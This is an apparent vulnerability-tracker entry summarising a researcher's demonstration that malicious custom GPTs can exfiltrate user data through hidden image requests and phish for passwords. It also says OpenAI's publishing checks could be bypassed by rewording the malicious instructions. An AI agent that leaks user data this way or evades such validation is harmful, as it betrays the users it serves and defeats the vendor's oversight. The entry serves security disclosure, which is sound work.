Malicious ChatGPT Agents: How GPTs Can Quietly Grab Your Data (Demo)
Summary
A researcher demonstrated that malicious GPTs (custom ChatGPT agents) can secretly steal user data by embedding hidden images in conversations that send information to external servers, and can also trick users into sharing personal details like passwords. OpenAI's validation checks for publishing GPTs can be easily bypassed by slightly rewording malicious instructions, allowing harmful GPTs to be shared publicly, though the researcher reported these vulnerabilities to OpenAI in November 2023 without receiving a fix.
Classification
Affected Vendors
Related Issues
Original source: https://embracethered.com/blog/posts/2023/openai-custom-malware-gpt/
First tracked: February 12, 2026 at 02:20 PM
Classified by LLM (prompt v3) · confidence: 92%